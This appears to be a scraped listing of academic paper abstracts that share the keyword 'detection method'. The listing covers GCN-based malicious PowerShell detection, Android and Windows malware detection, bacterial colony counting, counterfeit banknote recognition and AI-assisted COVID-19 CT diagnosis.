Malicious Powershell Detection Using Graph Convolution Network

The internet’s rapid growth has resulted in an increase in the number of malicious files. Recently, powershell scripts and Windows portable executable (PE) files have been used in malicious behaviors. To solve these problems, artificial intelligence (AI) based malware detection methods have been widely studied. Among AI techniques, the graph convolution network (GCN) was recently introduced. Here, we propose a malicious powershell detection method using a GCN. To use the GCN, we needed an adjacency matrix. Therefore, we proposed an adjacency matrix generation method using the Jaccard similarity. In addition, we show that the malicious powershell detection rate is increased by approximately 8.2% using GCN.

Download Full-text

Bacterial colonies detecting and counting based on enhanced CNN detection method

E3S Web of Conferences ◽

10.1051/e3sconf/202123302012 ◽

2021 ◽

Vol 233 ◽

pp. 02012

Author(s):

Shousheng Liu ◽

Zhigang Gai ◽

Xu Chai ◽

Fengxiang Guo ◽

Mei Zhang ◽

...

Keyword(s):

Target Detection ◽

Error Detection ◽

Detection Rate ◽

Detection Method ◽

Difficult Problem ◽

Detection Methods ◽

Detection Accuracy ◽

Detection Model ◽

Confidence Threshold ◽

Small Targets

Bacterial colonies detecting and counting is tedious and time-consuming work. Fortunately CNN (convolutional neural network) detection methods are effective for target detection. The bacterial colonies are a kind of small targets, which have been a difficult problem in the field of target detection technology. This paper proposes a small target enhancement detection method based on double CNNs, which can not only improve the detection accuracy, but also maintain the detection speed similar to the general detection model. The detection method uses double CNNs. The first CNN uses SSD_MOBILENET_V1 network with both target positioning and target recognition functions. The candidate targets are screened out with a low confidence threshold, which can ensure no missing detection of small targets. The second CNN obtains candidate target regions according to the first round of detection, intercepts image sub-blocks one by one, uses the MOBILENET_V1 network to filter out targets with a higher confidence threshold, which can ensure good detection of small targets. Through the two-round enhancement detection method has been transplanted to the embedded platform NVIDIA Jetson AGX Xavier, the detection accuracy of small targets is significantly improved, and the target error detection rate and missed detection rate are reduced to less than 1%.

Download Full-text

Permission Sensitivity-Based Malicious Application Detection for Android

Security and Communication Networks ◽

10.1155/2021/6689486 ◽

2021 ◽

Vol 2021 ◽

pp. 1-12

Author(s):

Yubo Song ◽

Yijin Geng ◽

Junbo Wang ◽

Shang Gao ◽

Wei Shi

Keyword(s):

Detection Method ◽

Malware Detection ◽

Feature Selection Method ◽

Machine Learning Algorithms ◽

Detection Methods ◽

Detection Accuracy ◽

Android Malware ◽

Android Malware Detection ◽

Private Data ◽

Weight Allocation

Since a growing number of malicious applications attempt to steal users’ private data by illegally invoking permissions, application stores have carried out many malware detection methods based on application permissions. However, most of them ignore specific permission combinations and application categories that affect the detection accuracy. The features they extracted are neither representative enough to distinguish benign and malicious applications. For these problems, an Android malware detection method based on permission sensitivity is proposed. First, for each kind of application categories, the permission features and permission combination features are extracted. The sensitive permission feature set corresponding to each category label is then obtained by the feature selection method based on permission sensitivity. In the following step, the permission call situation of the application to be detected is compared with the sensitive permission feature set, and the weight allocation method is used to quantify this information into numerical features. In the proposed method of malicious application detection, three machine-learning algorithms are selected to construct the classifier model and optimize the parameters. Compared with traditional methods, the proposed method consumed 60.94% less time while still achieving high accuracy of up to 92.17%.

Download Full-text

An API Semantics-Aware Malware Detection Method Based on Deep Learning

Security and Communication Networks ◽

10.1155/2019/1315047 ◽

2019 ◽

Vol 2019 ◽

pp. 1-9 ◽

Cited By ~ 1

Author(s):

Xin Ma ◽

Shize Guo ◽

Wei Bai ◽

Jun Chen ◽

Shiming Xia ◽

...

Keyword(s):

Machine Learning ◽

Detection Method ◽

Malware Detection ◽

Poor Performance ◽

Detection Methods ◽

Interference Detection ◽

Machine Learning Method ◽

Accuracy Rate ◽

Malware Classification ◽

Self Protection

The explosive growth of malware variants poses a continuously and deeply evolving challenge to information security. Traditional malware detection methods require a lot of manpower. However, machine learning has played an important role on malware classification and detection, and it is easily spoofed by malware disguising to be benign software by employing self-protection techniques, which leads to poor performance for existing techniques based on the machine learning method. In this paper, we analyze the local maliciousness about malware and implement an anti-interference detection framework based on API fragments, which uses the LSTM model to classify API fragments and employs ensemble learning to determine the final result of the entire API sequence. We present our experimental results on Ali-Tianchi contest API databases. By comparing with the experiments of some common methods, it is proved that our method based on local maliciousness has better performance, which is a higher accuracy rate of 0.9734.

Download Full-text

Improved FAST Corner Detection Based on Harris Algorithm for Chinese Characters

Advanced Materials Research ◽

10.4028/www.scientific.net/amr.850-851.767 ◽

2013 ◽

Vol 850-851 ◽

pp. 767-770 ◽

Cited By ~ 1

Author(s):

Na Yao ◽

Tie Cheng Bai ◽

Jie Chen

Keyword(s):

Feature Extraction ◽

Fast Algorithm ◽

Detection Rate ◽

Detection Method ◽

Corner Detection ◽

Detection Methods ◽

Chinese Characters ◽

Line Segments ◽

Running Time ◽

Shape Feature Extraction

According to the characteristics of Chinese characters image, we propose an improved corner detection method based on FAST algorithm and Harris algorithm to improve detection rate and shorten the running time for next feature extraction in this paper. The image of Chinese characters is detected for corners using FAST algorithm Firstly. Second, computing corner response function (CRF) of Harris algorithm, false corners are removed. The corners founded lastly are the endpoints of line segments, providing the length of line segments for shape feature extraction. The proposed method is compared with several corner detection methods over a number of images. Experimental results show that the proposed method shows better performance in terms of detection rate and running time.

Download Full-text

A Dynamic Malware Detection Approach by Mining the Frequency of API Calls

Applied Mechanics and Materials ◽

10.4028/www.scientific.net/amm.519-520.309 ◽

2014 ◽

Vol 519-520 ◽

pp. 309-312 ◽

Cited By ~ 2

Author(s):

Jin Rong Bai ◽

Zhen Zhou An ◽

Guo Zhong Zou ◽

Shi Guang Mu

Keyword(s):

Detection Rate ◽

Detection Method ◽

Malware Detection ◽

Experimental Results ◽

Detection Approach ◽

Dynamic Detection

Dynamic detection method based on software behavior is an efficient and effective way for anti-virus technology. Malware and benign executable differ mainly in the implementation of some special behavior to propagation and destruction. A program's execution flow is essentially equivalent to the stream of API calls. Analyzing the API calls frequency from six kinds of behaviors in the same time has the very well differentiate between malicious and benign executables. This paper proposed a dynamic malware detection approach by mining the frequency of sensitive native API calls and described experiments conducted against recent Win32 malware. Experimental results indicate that the detection rate of proposed method is 98% and the value of the AUC is 0.981. Furthermore, proposed method can identify known and unknown malware.

Download Full-text

Windows Malware Detection Method Based on the Path IRP

Applied Mechanics and Materials ◽

10.4028/www.scientific.net/amm.687-691.2626 ◽

2014 ◽

Vol 687-691 ◽

pp. 2626-2629

Author(s):

Fu Yong Zhang

Keyword(s):

Operating System ◽

Positive Selection ◽

Negative Selection ◽

Detection Rate ◽

Detection Method ◽

Malware Detection ◽

Experimental Results ◽

Selection Algorithm ◽

Negative Selection Algorithm ◽

Request Sequence

Because the IRP (I/O Request Packets) sequences of programs are not identical in different environments in the same operating system, which have a certain influence on the detection results. Through a lot of experiments, we found that the IRP request sequences of programs on the same operation path are consistent. Therefore, the new malware detection method based on the path IRP sequences is proposed. Every single IRP request sequence on the same operation path is extracted, Negative Selection Algorithm (NSA) and Positive Selection Algorithm (PSA) are used for detection. Experimental results reveal that our method outperforms the method which based on IRP sequences in detection rate.

Download Full-text

Joint Banknote Recognition and Counterfeit Detection Using Explainable Artificial Intelligence

Sensors ◽

10.3390/s19163607 ◽

2019 ◽

Vol 19 (16) ◽

pp. 3607 ◽

Cited By ~ 1

Author(s):

Miseon Han ◽

Jeongtae Kim

Keyword(s):

Artificial Intelligence ◽

Machine Learning ◽

European Union ◽

Detection Method ◽

Computation Time ◽

Learning System ◽

Detection Methods ◽

The European Union ◽

Explainable Artificial Intelligence ◽

Banknote Recognition

We investigated machine learning-based joint banknote recognition and counterfeit detection method. Unlike existing methods, since the proposed method simultaneously recognize banknote type and detect counterfeit detection, it is significantly faster than existing serial banknote recognition and counterfeit detection methods. Furthermore, we propose an explainable artificial intelligence method for visualizing regions that contributed to the recognition and detection. Using the visualization, it is possible to understand the behavior of the trained machine learning system. In experiments using the United State Dollar and the European Union Euro banknotes, the proposed method shows significant improvement in computation time from conventional serial method.

Download Full-text

Quality Inspection of Digital Archives of Application and Installation in Power Business Expanding based on Artificial Intelligence Technology

Journal of Physics Conference Series ◽

10.1088/1742-6596/2079/1/012030 ◽

2021 ◽

Vol 2079 (1) ◽

pp. 012030

Author(s):

Haihong Liang ◽

Ling Zeng ◽

Xiaozhou Shen ◽

Weiwei Shi ◽

Jiujiao Cang

Keyword(s):

Artificial Intelligence ◽

Classification Accuracy ◽

Detection Method ◽

Detection Methods ◽

Digital Archive ◽

Quality Inspection ◽

Digital Archives ◽

Evaluation Standard ◽

Quality Detection ◽

Artificial Intelligence Technology

Abstract The existing quality detection methods of business expansion digital archives have the problem of fuzzy evaluation standard, which leads to low classification accuracy. This paper designs a quality detection method of business expansion Digital Archives based on artificial intelligence technology. The business characteristics of business development are extracted, the minimum business data unit is described, the digital archive catalogue database is established, the digital archive evaluation standard is defined, the text similarity is calculated, the user model is established, and the quality inspection mode is established by using artificial intelligence technology. Experimental results: the average classification accuracy of the designed method based on artificial intelligence technology and the other two quality detection methods is 55.763, 43.560 and 42.605, which proves that the quality detection method based on artificial intelligence technology has higher use value.

Download Full-text

Application of Artificial Intelligence in Human Diagnosis and Public Health Management

10.21203/rs.3.rs-486721/v1 ◽

2021 ◽

Author(s):

Weiwei Wang ◽

Xinjie Zhao ◽

Yanshu Jia

Keyword(s):

Public Health ◽

Artificial Intelligence ◽

Detection Rate ◽

Detection Method ◽

Health Management ◽

Diagnosis Rate ◽

Missed Diagnosis ◽

Focus Detection ◽

Deep Learning Model ◽

Public Health Management

Abstract To improve the diagnostic efficiency and accuracy of corona virus disease 2019 (COVID-19), and to study the application of artificial intelligence (AI) in COVID-19 diagnosis and public health management, the computer tomography (CT) image data of 200 COVID-19 patients are collected, and the image is input into the AI auxiliary diagnosis software based on the deep learning model, "uAI the COVID-19 intelligent auxiliary analysis system", for focus detection. The software automatically carries on the pneumonia focus identification and the mark in batches, and automatically calculates the lesion volume. The result shows that the CT manifestations of the patients are mainly involved in multiple lobes, and in density, the most common shadow is the ground glass opacity. The detection rate of manual detection method is 95.30%, misdiagnosis rate is 0.20% and missed diagnosis rate is 4.50%; the detection rate of AI software focus detection method based on deep learning model is 99.76%, the misdiagnosis rate is 0.08%, and the missed diagnosis rate is 0.08%. Therefore, it can effectively identify COVID-19 focus and provide relevant data information of focus to provide objective data support for COVID-19 diagnosis and public health management.

Download Full-text

LSTM-Based Hierarchical Denoising Network for Android Malware Detection

Security and Communication Networks ◽

10.1155/2018/5249190 ◽

2018 ◽

Vol 2018 ◽

pp. 1-18 ◽

Cited By ~ 3

Author(s):

Jinpei Yan ◽

Yong Qi ◽

Qifan Rao

Keyword(s):

Detection Method ◽

Expert Knowledge ◽

Detection Efficiency ◽

Malware Detection ◽

Mobile Security ◽

Detection Methods ◽

Android Malware ◽

Android Malware Detection ◽

Malicious Behavior ◽

Gradient Scaling

Mobile security is an important issue on Android platform. Most malware detection methods based on machine learning models heavily rely on expert knowledge for manual feature engineering, which are still difficult to fully describe malwares. In this paper, we present LSTM-based hierarchical denoise network (HDN), a novel static Android malware detection method which uses LSTM to directly learn from the raw opcode sequences extracted from decompiled Android files. However, most opcode sequences are too long for LSTM to train due to the gradient vanishing problem. Hence, HDN uses a hierarchical structure, whose first-level LSTM parallelly computes on opcode subsequences (we called them method blocks) to learn the dense representations; then the second-level LSTM can learn and detect malware through method block sequences. Considering that malicious behavior only appears in partial sequence segments, HDN uses method block denoise module (MBDM) for data denoising by adaptive gradient scaling strategy based on loss cache. We evaluate and compare HDN with the latest mainstream researches on three datasets. The results show that HDN outperforms these Android malware detection methods,and it is able to capture longer sequence features and has better detection efficiency than N-gram-based malware detection which is similar to our method.

Download Full-text